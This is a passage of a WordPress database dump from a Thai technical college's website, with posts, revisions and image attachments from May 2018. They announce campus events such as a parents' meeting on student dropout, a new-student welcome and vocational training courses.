(2733, 3, '2018-05-23 11:44:14', '2018-05-23 04:44:14', '<img class=\"wp-image-2730 size-large aligncenter\" src=\"/wp-content/uploads/2018/05/31957321_580067059036153_2076923867971977216_o-1024x642.jpg\" alt=\"\" width=\"640\" height=\"401\" /> <img class=\"wp-image-2727 size-large aligncenter\" src=\"/wp-content/uploads/2018/05/31961281_580067749036084_2144024640253591552_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2731 size-large\" src=\"/wp-content/uploads/2018/05/31964236_580067762369416_3093648626728042496_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2726 size-large\" src=\"/wp-content/uploads/2018/05/31958716_580075182368674_6625282560714866688_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2724 size-large\" src=\"/wp-content/uploads/2018/05/31960619_580078705701655_3009427663833006080_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2729 size-large\" src=\"/wp-content/uploads/2018/05/31967910_580074732368719_894167463237779456_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2725 size-large\" src=\"/wp-content/uploads/2018/05/31946440_580075529035306_5860757633039859712_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2728 size-large\" src=\"/wp-content/uploads/2018/05/31957893_580074842368708_4608907316320796672_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n\n \n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D583114088731450%26id%3D100010985913485&width=500\" width=\"500\" height=\"816\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\n<span style=\"color: #0000ff;\">ดูรูปภาพเพิ่มเติม ได้ที่ FB งานประชาสัมพันธ์ วท.ระยอง</span> <a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.580071409035718&type=3\"><span style=\"color: #ff0000;\">>>คลิก</span></a>', 'การประชุมเครือข่ายผู้ปกครอง นักเรียนระดับชั้น ปวช.1 และ ปวส.1 เพื่อลดปัญหาการออกกลางคัน ประจำปีการศึกษา 2561 วันอาทิตย์ที่ 6 และ 13 พฤษภาคม 2561 ณ ห้องประชุม ชั้น 4 อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2723-autosave-v1', '', '', '2018-05-23 11:44:14', '2018-05-23 04:44:14', '', 2723, 'http://www.technicrayong.ac.th/2723-autosave-v1/', 0, 'revision', '', 0),
(2734, 3, '2018-05-23 11:43:03', '2018-05-23 04:43:03', '<img class=\"wp-image-2730 size-large aligncenter\" src=\"/wp-content/uploads/2018/05/31957321_580067059036153_2076923867971977216_o-1024x642.jpg\" alt=\"\" width=\"640\" height=\"401\" /> <img class=\"wp-image-2727 size-large aligncenter\" src=\"/wp-content/uploads/2018/05/31961281_580067749036084_2144024640253591552_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2731 size-large\" src=\"/wp-content/uploads/2018/05/31964236_580067762369416_3093648626728042496_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2726 size-large\" src=\"/wp-content/uploads/2018/05/31958716_580075182368674_6625282560714866688_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2724 size-large\" src=\"/wp-content/uploads/2018/05/31960619_580078705701655_3009427663833006080_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2729 size-large\" src=\"/wp-content/uploads/2018/05/31967910_580074732368719_894167463237779456_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2725 size-large\" src=\"/wp-content/uploads/2018/05/31946440_580075529035306_5860757633039859712_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2728 size-large\" src=\"/wp-content/uploads/2018/05/31957893_580074842368708_4608907316320796672_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n \r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D583114088731450%26id%3D100010985913485&width=500\" width=\"500\" height=\"816\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<span style=\"color: #0000ff;\">ดูรูปภาพเพิ่มเติม ได้ที่ FB งานประชาสัมพันธ์ วท.ระยอง</span> <a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.580071409035718&type=3\"><span style=\"color: #ff0000;\">>>คลิก</span></a>', 'การประชุมเครือข่ายผู้ปกครอง นักเรียนระดับชั้น ปวช.1 และ ปวส.1 เพื่อลดปัญหาการออกกลางคัน ประจำปีการศึกษา 2561งานประชาสัมพันธ์ วท.ระยอง วันอาทิตย์ที่ 6 และ 13 พฤษภาคม 2561 ณ ห้องประชุม ชั้น 4 อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2723-revision-v1', '', '', '2018-05-23 11:43:03', '2018-05-23 04:43:03', '', 2723, 'http://www.technicrayong.ac.th/2723-revision-v1/', 0, 'revision', '', 0),
(2735, 3, '2018-05-23 11:44:06', '2018-05-23 04:44:06', '<img class=\"wp-image-2730 size-large aligncenter\" src=\"/wp-content/uploads/2018/05/31957321_580067059036153_2076923867971977216_o-1024x642.jpg\" alt=\"\" width=\"640\" height=\"401\" /> <img class=\"wp-image-2727 size-large aligncenter\" src=\"/wp-content/uploads/2018/05/31961281_580067749036084_2144024640253591552_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2731 size-large\" src=\"/wp-content/uploads/2018/05/31964236_580067762369416_3093648626728042496_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2726 size-large\" src=\"/wp-content/uploads/2018/05/31958716_580075182368674_6625282560714866688_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2724 size-large\" src=\"/wp-content/uploads/2018/05/31960619_580078705701655_3009427663833006080_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2729 size-large\" src=\"/wp-content/uploads/2018/05/31967910_580074732368719_894167463237779456_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2725 size-large\" src=\"/wp-content/uploads/2018/05/31946440_580075529035306_5860757633039859712_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-2728 size-large\" src=\"/wp-content/uploads/2018/05/31957893_580074842368708_4608907316320796672_o-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n \r\n<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D583114088731450%26id%3D100010985913485&width=500\" width=\"500\" height=\"816\" frameborder=\"0\" scrolling=\"no\"></iframe></p>\r\n<span style=\"color: #0000ff;\">ดูรูปภาพเพิ่มเติม ได้ที่ FB งานประชาสัมพันธ์ วท.ระยอง</span> <a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.580071409035718&type=3\"><span style=\"color: #ff0000;\">>>คลิก</span></a>', 'การประชุมเครือข่ายผู้ปกครอง นักเรียนระดับชั้น ปวช.1 และ ปวส.1 เพื่อลดปัญหาการออกกลางคัน ประจำปีการศึกษา 2561 วันอาทิตย์ที่ 6 และ 13 พฤษภาคม 2561 ณ ห้องประชุม ชั้น 4 อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2723-revision-v1', '', '', '2018-05-23 11:44:06', '2018-05-23 04:44:06', '', 2723, 'http://www.technicrayong.ac.th/2723-revision-v1/', 0, 'revision', '', 0),
(2736, 3, '2018-05-23 11:47:47', '2018-05-23 04:47:47', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D583977438645115%26id%3D100010985913485&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ยินดีต้อนรับ นักเรียน นักศึกษาใหม่ ภาคเรียนที่ 1 ประจำปีการศึกษา 2561 เข้าสู่กิจกรรมหน้าเสาธงในวันแรกของการเปิดภาคเรียน ในวันอังคารที่ 15 พฤษภาคม 2561 ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a2%e0%b8%b4%e0%b8%99%e0%b8%94%e0%b8%b5%e0%b8%95%e0%b9%89%e0%b8%ad%e0%b8%99%e0%b8%a3%e0%b8%b1%e0%b8%9a-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1', '', '', '2018-05-23 11:47:47', '2018-05-23 04:47:47', '', 0, 'http://www.technicrayong.ac.th/?p=2736', 415, 'post', '', 0),
(2737, 3, '2018-05-23 11:47:33', '2018-05-23 04:47:33', '', '32474701_583972381978954_1491114698442014720_o', '', 'inherit', 'closed', 'closed', '', '32474701_583972381978954_1491114698442014720_o', '', '', '2018-05-23 11:47:33', '2018-05-23 04:47:33', '', 2736, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/32474701_583972381978954_1491114698442014720_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2738, 3, '2018-05-23 11:47:47', '2018-05-23 04:47:47', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D583977438645115%26id%3D100010985913485&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ยินดีต้อนรับ นักเรียน นักศึกษาใหม่ ภาคเรียนที่ 1 ประจำปีการศึกษา 2561 เข้าสู่กิจกรรมหน้าเสาธงในวันแรกของการเปิดภาคเรียน ในวันอังคารที่ 15 พฤษภาคม 2561 ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2736-revision-v1', '', '', '2018-05-23 11:47:47', '2018-05-23 04:47:47', '', 2736, 'http://www.technicrayong.ac.th/2736-revision-v1/', 0, 'revision', '', 0),
(2739, 3, '2018-05-23 11:48:08', '2018-05-23 04:48:08', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D583977438645115%26id%3D100010985913485&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ยินดีต้อนรับ นักเรียน นักศึกษาใหม่ ภาคเรียนที่ 1 ประจำปีการศึกษา 2561 เข้าสู่กิจกรรมหน้าเสาธงในวันแรกของการเปิดภาคเรียน ในวันอังคารที่ 15 พฤษภาคม 2561 ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2736-autosave-v1', '', '', '2018-05-23 11:48:08', '2018-05-23 04:48:08', '', 2736, 'http://www.technicrayong.ac.th/2736-autosave-v1/', 0, 'revision', '', 0),
(2740, 3, '2018-05-23 11:55:17', '2018-05-23 04:55:17', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D584031288639730%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ยินดีต้อนรับ ครูพัณณ์ชิตา คำมะฤทธิ์สินชัย ซึ่งย้ายมาประจำที่วิทยาลัยเทคนิคระยองในสาขาวิชาคอมพิวเตอร์ธุรกิจ จากวิทยาลัยเทคนิคกาญจนาภิเษก มหานคร วันอังคารที่ 15 พฤษภาคม 2561 ณ ห้องสัมมนาอาชีวศึกษา อาคารอำนวยการวิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a2%e0%b8%b4%e0%b8%99%e0%b8%94%e0%b8%b5%e0%b8%95%e0%b9%89%e0%b8%ad%e0%b8%99%e0%b8%a3%e0%b8%b1%e0%b8%9a-%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%9e%e0%b8%b1%e0%b8%93%e0%b8%93%e0%b9%8c%e0%b8%8a%e0%b8%b4', '', '', '2018-05-23 11:55:17', '2018-05-23 04:55:17', '', 0, 'http://www.technicrayong.ac.th/?p=2740', 414, 'post', '', 0),
(2741, 3, '2018-05-23 11:54:57', '2018-05-23 04:54:57', '', '32584065_584027568640102_2616186243532193792_o', '', 'inherit', 'closed', 'closed', '', '32584065_584027568640102_2616186243532193792_o', '', '', '2018-05-23 11:54:57', '2018-05-23 04:54:57', '', 2740, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/32584065_584027568640102_2616186243532193792_o.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2742, 3, '2018-05-23 11:55:17', '2018-05-23 04:55:17', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D584031288639730%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ยินดีต้อนรับ ครูพัณณ์ชิตา คำมะฤทธิ์สินชัย ซึ่งย้ายมาประจำที่วิทยาลัยเทคนิคระยองในสาขาวิชาคอมพิวเตอร์ธุรกิจ จากวิทยาลัยเทคนิคกาญจนาภิเษก มหานคร วันอังคารที่ 15 พฤษภาคม 2561 ณ ห้องสัมมนาอาชีวศึกษา อาคารอำนวยการวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2740-revision-v1', '', '', '2018-05-23 11:55:17', '2018-05-23 04:55:17', '', 2740, 'http://www.technicrayong.ac.th/2740-revision-v1/', 0, 'revision', '', 0),
(2743, 3, '2018-05-23 11:55:27', '2018-05-23 04:55:27', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D584031288639730%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ยินดีต้อนรับ ครูพัณณ์ชิตา คำมะฤทธิ์สินชัย ซึ่งย้ายมาประจำที่วิทยาลัยเทคนิคระยองในสาขาวิชาคอมพิวเตอร์ธุรกิจ จากวิทยาลัยเทคนิคกาญจนาภิเษก มหานคร วันอังคารที่ 15 พฤษภาคม 2561 ณ ห้องสัมมนาอาชีวศึกษา อาคารอำนวยการวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2740-autosave-v1', '', '', '2018-05-23 11:55:27', '2018-05-23 04:55:27', '', 2740, 'http://www.technicrayong.ac.th/2740-autosave-v1/', 0, 'revision', '', 0),
(2744, 3, '2018-05-23 11:58:48', '2018-05-23 04:58:48', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D584379515271574%26id%3D100010985913485&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บริษัท โฮม โปรดักส์ เซ็นเตอร์ จำกัด (มหาชน) เข้าพบผู้บริหาร คณะครู วิทยาลัยเทคนิคระยอง และเข้าแนะแนวรับนักศึกษา สาขาวิชาการตลาด สาขางานธุรกิจค้าปลีก เข้าร่วมโครงการเพื่อศึกษาต่อในระดับ ปวส. ทวิภาคี ณ วิทยาลัยเทคนิคระยอง วันพุธที่ 16 พฤษภาคม 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%a9%e0%b8%b1%e0%b8%97-%e0%b9%82%e0%b8%ae%e0%b8%a1-%e0%b9%82%e0%b8%9b%e0%b8%a3%e0%b8%94%e0%b8%b1%e0%b8%81%e0%b8%aa%e0%b9%8c-%e0%b9%80%e0%b8%8b%e0%b9%87%e0%b8%99', '', '', '2018-05-23 11:58:48', '2018-05-23 04:58:48', '', 0, 'http://www.technicrayong.ac.th/?p=2744', 413, 'post', '', 0),
(2745, 3, '2018-05-23 11:58:28', '2018-05-23 04:58:28', '', '32411150_584378798604979_2985712207339192320_o', '', 'inherit', 'closed', 'closed', '', '32411150_584378798604979_2985712207339192320_o', '', '', '2018-05-23 11:58:28', '2018-05-23 04:58:28', '', 2744, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/32411150_584378798604979_2985712207339192320_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2746, 3, '2018-05-23 11:58:48', '2018-05-23 04:58:48', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D584379515271574%26id%3D100010985913485&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บริษัท โฮม โปรดักส์ เซ็นเตอร์ จำกัด (มหาชน) เข้าพบผู้บริหาร คณะครู วิทยาลัยเทคนิคระยอง และเข้าแนะแนวรับนักศึกษา สาขาวิชาการตลาด สาขางานธุรกิจค้าปลีก เข้าร่วมโครงการเพื่อศึกษาต่อในระดับ ปวส. ทวิภาคี ณ วิทยาลัยเทคนิคระยอง วันพุธที่ 16 พฤษภาคม 2561', '', 'inherit', 'closed', 'closed', '', '2744-revision-v1', '', '', '2018-05-23 11:58:48', '2018-05-23 04:58:48', '', 2744, 'http://www.technicrayong.ac.th/2744-revision-v1/', 0, 'revision', '', 0),
(2747, 3, '2018-05-23 11:58:56', '2018-05-23 04:58:56', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D584379515271574%26id%3D100010985913485&width=500\" width=\"500\" height=\"683\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'บริษัท โฮม โปรดักส์ เซ็นเตอร์ จำกัด (มหาชน) เข้าพบผู้บริหาร คณะครู วิทยาลัยเทคนิคระยอง และเข้าแนะแนวรับนักศึกษา สาขาวิชาการตลาด สาขางานธุรกิจค้าปลีก เข้าร่วมโครงการเพื่อศึกษาต่อในระดับ ปวส. ทวิภาคี ณ วิทยาลัยเทคนิคระยอง วันพุธที่ 16 พฤษภาคม 2561', '', 'inherit', 'closed', 'closed', '', '2744-autosave-v1', '', '', '2018-05-23 11:58:56', '2018-05-23 04:58:56', '', 2744, 'http://www.technicrayong.ac.th/2744-autosave-v1/', 0, 'revision', '', 0),
(2748, 3, '2018-05-23 12:01:11', '2018-05-23 05:01:11', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D584416208601238%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'การอบรมหลักสูตรระยะสั้นเพื่อพัฒนากำลังคนในระดับอาชีวศึกษา รองรับการพัฒนาระเบียงเศรษฐกิจพิเศษภาคตะวันออก (EEC) จัดขึ้นระหว่างวันที่ 16-20 พฤษภาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1%e0%b8%ab%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%aa%e0%b8%b9%e0%b8%95%e0%b8%a3%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%b0%e0%b8%aa%e0%b8%b1%e0%b9%89', '', '', '2018-05-23 12:02:50', '2018-05-23 05:02:50', '', 0, 'http://www.technicrayong.ac.th/?p=2748', 412, 'post', '', 0),
(2749, 3, '2018-05-23 12:00:45', '2018-05-23 05:00:45', '', '32544035_584409218601937_7804746507944460288_o', '', 'inherit', 'closed', 'closed', '', '32544035_584409218601937_7804746507944460288_o', '', '', '2018-05-23 12:00:45', '2018-05-23 05:00:45', '', 2748, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/32544035_584409218601937_7804746507944460288_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2750, 3, '2018-05-23 12:01:11', '2018-05-23 05:01:11', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D584416208601238%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'การอบรมหลักสูตรระยะสั้นเพื่อพัฒนากำลังคนในระดับอาชีวศึกษา รองรับการพัฒนาระเบียงเศรษฐกิจพิเศษภาคตะวันออก (EEC) จัดขึ้นระหว่างวันที่ 16-20 พฤษภาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2748-revision-v1', '', '', '2018-05-23 12:01:11', '2018-05-23 05:01:11', '', 2748, 'http://www.technicrayong.ac.th/2748-revision-v1/', 0, 'revision', '', 0),
(2751, 3, '2018-05-23 12:02:59', '2018-05-23 05:02:59', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D584416208601238%26id%3D100010985913485&width=500\" width=\"500\" height=\"721\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'การอบรมหลักสูตรระยะสั้นเพื่อพัฒนากำลังคนในระดับอาชีวศึกษา รองรับการพัฒนาระเบียงเศรษฐกิจพิเศษภาคตะวันออก (EEC) จัดขึ้นระหว่างวันที่ 16-20 พฤษภาคม 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2748-autosave-v1', '', '', '2018-05-23 12:02:59', '2018-05-23 05:02:59', '', 2748, 'http://www.technicrayong.ac.th/2748-autosave-v1/', 0, 'revision', '', 0),
(2752, 3, '2018-05-23 12:06:34', '2018-05-23 05:06:34', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D584814115228114%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'การปฐมนิเทศนักศึกษาฝึกอาชีพ ระบบทวิภาคี ภาคเรียนที่ 1 ปีการศึกษา 2561 ในระดับชั้น ปวช. ปวส.และระบบทวิภาคี ณ.อาคาร อบจ. ชั้น 4 วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%90%e0%b8%a1%e0%b8%99%e0%b8%b4%e0%b9%80%e0%b8%97%e0%b8%a8%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%9d%e0%b8%b6%e0%b8%81', '', '', '2018-05-23 12:06:34', '2018-05-23 05:06:34', '', 0, 'http://www.technicrayong.ac.th/?p=2752', 411, 'post', '', 0),
(2753, 3, '2018-05-23 12:06:14', '2018-05-23 05:06:14', '', '32788821_584805035229022_201665623833444352_o', '', 'inherit', 'closed', 'closed', '', '32788821_584805035229022_201665623833444352_o', '', '', '2018-05-23 12:06:14', '2018-05-23 05:06:14', '', 2752, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/32788821_584805035229022_201665623833444352_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(2754, 3, '2018-05-23 12:06:34', '2018-05-23 05:06:34', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D584814115228114%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'การปฐมนิเทศนักศึกษาฝึกอาชีพ ระบบทวิภาคี ภาคเรียนที่ 1 ปีการศึกษา 2561 ในระดับชั้น ปวช. ปวส.และระบบทวิภาคี ณ.อาคาร อบจ. ชั้น 4 วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2752-revision-v1', '', '', '2018-05-23 12:06:34', '2018-05-23 05:06:34', '', 2752, 'http://www.technicrayong.ac.th/2752-revision-v1/', 0, 'revision', '', 0),
(2755, 3, '2018-05-23 12:06:45', '2018-05-23 05:06:45', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D584814115228114%26id%3D100010985913485&width=500\" width=\"500\" height=\"740\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'การปฐมนิเทศนักศึกษาฝึกอาชีพ ระบบทวิภาคี ภาคเรียนที่ 1 ปีการศึกษา 2561 ในระดับชั้น ปวช. ปวส.และระบบทวิภาคี ณ.อาคาร อบจ. ชั้น 4 วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '2752-autosave-v1', '', '', '2018-05-23 12:06:45', '2018-05-23 05:06:45', '', 2752, 'http://www.technicrayong.ac.th/2752-autosave-v1/', 0, 'revision', '', 0),
(2756, 3, '2018-05-23 12:15:15', '2018-05-23 05:15:15', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D584821838560675%26id%3D100010985913485&width=500\" width=\"500\" height=\"778\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'เข้าร่วมประชุม เพื่อวางแผนพัฒนา \"วิชาชีพอาหารถิ่นจังหวัดระยอง\" ระหว่างปี 2561-2562 และร่วมหารือเกี่ยวกับการสร้างความร่วมมือในการดำเนินโครงการเชฟชุมชนเพื่อท่องเที่ยวไทยอย่างยั่งยืน ณ ห้องประชุมวิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1-%e0%b9%80%e0%b8%9e%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%a7%e0%b8%b2%e0%b8%87', '', '', '2018-05-23 12:15:15', '2018-05-23 05:15:15', '', 0, 'http://www.technicrayong.ac.th/?p=2756', 410, 'post', '', 0),
(2757, 3, '2018-05-23 12:14:58', '2018-05-23 05:14:58', '', '32648668_584818418561017_6677711823497592832_o', '', 'inherit', 'closed', 'closed', '', '32648668_584818418561017_6677711823497592832_o', '', '', '2018-05-23 12:14:58', '2018-05-23 05:14:58', '', 2756, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/32648668_584818418561017_6677711823497592832_o.jpg', 0, 'attachment', 'image/jpeg', 0),
